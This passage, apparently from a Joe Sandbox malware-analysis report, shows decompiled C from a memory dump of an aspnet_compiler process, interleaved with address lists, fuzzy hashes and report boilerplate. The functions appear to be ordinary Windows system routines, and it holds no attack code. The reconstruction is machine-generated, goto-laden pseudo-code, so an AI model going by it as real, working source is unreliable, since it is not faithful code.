				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x11c7b9c; // 0x0
					_t74 = L010F4620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01119650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L010F77F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0111F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E011113C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L010F77F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01119650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x010dc608
0x010dc615
0x010dc625
0x010dc62d
0x010dc635
0x010dc640
0x010dc680
0x010dc687
0x010dc688
0x010dc689
0x010dc694
0x010dc694
0x010dc642
0x010dc64a
0x010dc697
0x01147a25
0x01147a2b
0x01147a2e
0x01147a30
0x01147bea
0x01147bea
0x00000000
0x01147bea
0x01147a36
0x01147a43
0x01147a48
0x01147a4c
0x01147a4e
0x00000000
0x00000000
0x01147a58
0x01147a5a
0x01147a5b
0x01147a5c
0x01147a5d
0x01147a63
0x01147a64
0x01147a6a
0x01147a6c
0x01147a6e
0x011479cb
0x011479cb
0x011479ce
0x011479d0
0x01147a98
0x01147a9b
0x01147a9b
0x01147a9e
0x01147aa1
0x01147bbe
0x01147bbe
0x01147bc0
0x01147be0
0x01147be0
0x01147a01
0x01147a01
0x01147a05
0x01147a07
0x01147a15
0x01147a15
0x01147a1a
0x00000000
0x01147a1a
0x01147bc2
0x01147bc6
0x01147bc9
0x01147bcd
0x01147bcf
0x011479e6
0x011479e6
0x011479eb
0x011479eb
0x011479ef
0x011479f1
0x00000000
0x00000000
0x011479f3
0x011479f5
0x011479ff
0x011479ff
0x00000000
0x011479ff
0x011479f7
0x011479fd
0x00000000
0x00000000
0x00000000
0x011479fd
0x01147bd5
0x01147bd8
0x00000000
0x00000000
0x01147ba9
0x01147bac
0x01147bb0
0x01147bb1
0x01147bb1
0x01147bb6
0x00000000
0x01147bb6
0x01147aa7
0x01147aaa
0x00000000
0x00000000
0x01147ab2
0x01147ab3
0x01147ab5
0x01147aec
0x01147aef
0x01147b25
0x01147b28
0x01147b62
0x01147b64
0x01147b8f
0x01147b92
0x01147b96
0x01147b98
0x00000000
0x00000000
0x01147b9e
0x01147b9f
0x01147ba3
0x00000000
0x01147ba3
0x01147b66
0x01147b68
0x01147ae2
0x01147ae2
0x00000000
0x01147ae2
0x01147b6e
0x01147b72
0x01147b75
0x01147b81
0x01147b85
0x01147b87
0x00000000
0x00000000
0x01147b31
0x01147b34
0x01147b3c
0x01147b45
0x01147b46
0x01147b4f
0x01147b51
0x01147b57
0x01147b59
0x01147b59
0x00000000
0x01147b59
0x01147b77
0x00000000
0x01147b77
0x01147b2a
0x00000000
0x01147b2a
0x01147af1
0x01147af3
0x00000000
0x00000000
0x01147afb
0x01147afc
0x01147afe
0x00000000
0x00000000
0x01147b00
0x01147b03
0x00000000
0x00000000
0x01147b05
0x01147b09
0x01147b0d
0x01147b0f
0x00000000
0x00000000
0x01147b18
0x01147b1d
0x00000000
0x01147b1d
0x01147ab7
0x01147ab9
0x00000000
0x00000000
0x01147abf
0x01147ac1
0x00000000
0x00000000
0x01147ac3
0x01147ac6
0x00000000
0x00000000
0x01147ac8
0x01147acc
0x01147ad0
0x01147ad2
0x00000000
0x00000000
0x01147adb
0x00000000
0x01147adb
0x011479d6
0x011479d9
0x011479dc
0x01147a91
0x01147a94
0x00000000
0x01147a94
0x011479e2
0x00000000
0x011479e2
0x01147a74
0x01147a7a
0x00000000
0x00000000
0x01147a8a
0x01147a21
0x01147a21
0x00000000
0x01147a21
0x010dc650
0x010dc651
0x010dc656
0x010dc65c
0x010dc65d
0x010dc663
0x010dc664
0x010dc66a
0x010dc66e
0x011479c5
0x011479c7
0x00000000
0x011479c7
0x010dc67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b936560cfeca78748bd43441044af2fd47dc71a59e3abf9b0db7b69eacf8fc3a
Instruction ID: a8578d1a7828ebcd0586353dd4051217832e8881a7fbc8b7034ab28d642986c0
Opcode Fuzzy Hash: b936560cfeca78748bd43441044af2fd47dc71a59e3abf9b0db7b69eacf8fc3a
Instruction Fuzzy Hash: BC81A6756442418FDB2ECE58C880A7BB7E4FF84B64F29482EEE459B281D330DD41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01156DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E01156DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L010F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01156B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E010F7D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01119AE0();
					_t87 = L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0115795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0115795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0115795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0115795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L010F4620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01156B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01156B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01156B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01156B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E010F7D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01119AE0();
								L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L010F2400( &_v36);
							if(_v24 >= 0) {
								_t87 = L010F2400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L010F2400( &_v52);
							}
							if(_v28 >= 0) {
								return L010F2400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x01156dd4
0x01156dde
0x01156de1
0x01156de3
0x01156de6
0x01156de9
0x01156dec
0x01156def
0x01156df2
0x01156df5
0x01156dfe
0x01156e04
0x01156e09
0x01156e0d
0x01156e18
0x01156e1b
0x01156e22
0x01156e2d
0x01156e30
0x01156e36
0x01156e42
0x01156e4d
0x01156e50
0x01156e55
0x01156e5c
0x01156e6e
0x01156e5e
0x01156e67
0x01156e67
0x01156e73
0x01156e74
0x01156e77
0x01156e7c
0x01156e7d
0x01156e8e
0x01156e93
0x01156e9c
0x01156ea8
0x01156eab
0x01156eac
0x01156eb3
0x01156ecd
0x01156edc
0x01156ee2
0x01156ee5
0x01156ef2
0x01156efb
0x01156f01
0x01156f06
0x01156f0b
0x01156f11
0x01156f1a
0x01156f22
0x01156f26
0x01156f26
0x01156f33
0x01156f41
0x01156f44
0x01156f47
0x01156f54
0x01156f65
0x01156f77
0x01156f7c
0x01156f82
0x01156f91
0x01156f99
0x01156fa3
0x01156fae
0x01156fae
0x01156fba
0x01156fbb
0x01156fbc
0x01156fc1
0x01156fc2
0x01156fd3
0x01156fd8
0x01156fd8
0x01156fdf
0x01156fe8
0x01156fee
0x01156fee
0x01156ff5
0x01156ffb
0x01156ffb
0x01157004
0x00000000
0x0115700a
0x01157004
0x01156eb3
0x01156e9c
0x01157015

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 481fd89cfb9cb06a06440619660c3f1b931aa86ed78a1bc6a29151f9fc4e4a57
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 23717071E00219EFDB15DFA8C944AEEBBB9FF48714F504069EA15E7290DB34EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0116B8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E0116B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x11c7b9c; // 0x0
				_t124 = L010F4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01119800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E011195B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E011195D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L010F77F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01119910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E011195D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x11c7b9c; // 0x0
									_t92 = L010F4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01119910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E010DA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0116E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0116E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E011195B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x0116b8d9
0x0116b8e4
0x00000000
0x0116b8e6
0x0116b8f3
0x0116b8f5
0x0116b8f5
0x0116b8f8
0x0116b920
0x0116b924
0x0116b936
0x0116b939
0x0116b93d
0x0116b948
0x0116b9a0
0x0116b9a0
0x0116b9a4
0x0116b9bf
0x0116b9c4
0x0116b9c6
0x0116b9cd
0x0116b9d1
0x0116bad4
0x0116bad8
0x0116bada
0x0116badc
0x0116badc
0x0116badf
0x0116bae0
0x0116bae2
0x0116bae4
0x0116baec
0x0116baee
0x0116baf0
0x0116baf0
0x0116baec
0x0116bafb
0x0116bafc
0x0116bafe
0x0116bb01
0x0116bb01
0x00000000
0x0116bb06
0x0116b9d7
0x0116b9db
0x0116b9db
0x0116b9de
0x0116b9de
0x0116b9e4
0x0116b9e7
0x0116b9ea
0x0116b9ec
0x0116b9ef
0x0116b9f3
0x0116ba1b
0x0116ba1b
0x0116ba23
0x0116ba24
0x0116ba27
0x0116ba2a
0x0116ba2b
0x0116ba2e
0x0116ba30
0x0116ba37
0x0116ba3f
0x0116ba9c
0x0116baa2
0x0116bb13
0x0116bb15
0x0116baae
0x0116baae
0x0116bab3
0x0116bab5
0x0116baba
0x0116bac8
0x0116bac8
0x0116baba
0x0116bacd
0x0116bacf
0x00000000
0x0116bacf
0x0116bb1a
0x00000000
0x0116bb1c
0x0116baa7
0x0116bb11
0x00000000
0x0116bb11
0x0116baa9
0x00000000
0x00000000
0x00000000
0x00000000
0x0116ba41
0x0116ba41
0x0116ba41
0x0116ba58
0x0116ba5d
0x0116ba62
0x00000000
0x00000000
0x0116ba64
0x0116ba67
0x0116ba68
0x0116ba69
0x0116ba6c
0x0116ba6f
0x0116ba71
0x0116ba78
0x0116ba80
0x00000000
0x00000000
0x0116ba90
0x0116ba90
0x0116ba97
0x00000000
0x0116ba97
0x0116b9f5
0x0116b9f7
0x0116b9f7
0x0116b9fa
0x0116ba03
0x0116ba07
0x0116ba0c
0x0116ba10
0x0116ba17
0x00000000
0x0116b9f7
0x0116b9a6
0x0116b9a8
0x0116b9af
0x0116b9b3
0x00000000
0x00000000
0x0116b9b9
0x00000000
0x0116b9b9
0x0116b94d
0x0116b98f
0x0116b995
0x0116b999
0x0116b960
0x0116b967
0x0116b968
0x0116b96a
0x00000000
0x0116b96a
0x0116b99b
0x0116b99e
0x00000000
0x00000000
0x00000000
0x0116b99e
0x0116b951
0x0116b954
0x0116b95a
0x0116b95e
0x0116b972
0x0116b979
0x0116b97d
0x0116b97f
0x0116b980
0x0116b982
0x0116b984
0x00000000
0x0116b984
0x00000000
0x0116b926
0x00000000
0x0116b926

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb2e6ffd8497921f5831fa89af22a59faa3bcc0dd426dfddf224795f8805630
Instruction ID: 9480191c568b7af93e7b1f1d400ddd29a754a13ffca04670e35871fd84b8debc
Opcode Fuzzy Hash: 1cb2e6ffd8497921f5831fa89af22a59faa3bcc0dd426dfddf224795f8805630
Instruction Fuzzy Hash: EB712072304706AFE73ACF18C841FAABBF9EB40724F154528E655C76A0EB72E950CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01102AE4 Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01102AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x11c8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x11c8208; // 0x11c8207
				_t8 = _t57 + 0x11c8208; // 0x11c8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x11c8450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x11c821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x11c6d5c; // 0x7f200654
							_t72 =  *0x11c6d5c; // 0x7f200654
							_t75 =  *0x11c6d5c; // 0x7f200654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x11c6d5c; // 0x7f200654
							_t84 =  *0x11c6d5c; // 0x7f200654
							_t87 =  *0x11c6d5c; // 0x7f200654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0111F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x01102ae4
0x01102aec
0x01102aef
0x01102af4
0x01102af7
0x01102afd
0x01102b92
0x01102b92
0x01102b97
0x01102b9c
0x01102b9c
0x01102b03
0x01102b06
0x01102b09
0x01102b09
0x01102b0f
0x01102b15
0x01102b15
0x01102b1b
0x01102b1e
0x01102b21
0x01102b26
0x01102b29
0x01102b81
0x01102b84
0x01102c0e
0x01102c15
0x01102c24
0x01102c24
0x01102b8a
0x01102b8a
0x01102b8a
0x01102b8a
0x01102b90
0x00000000
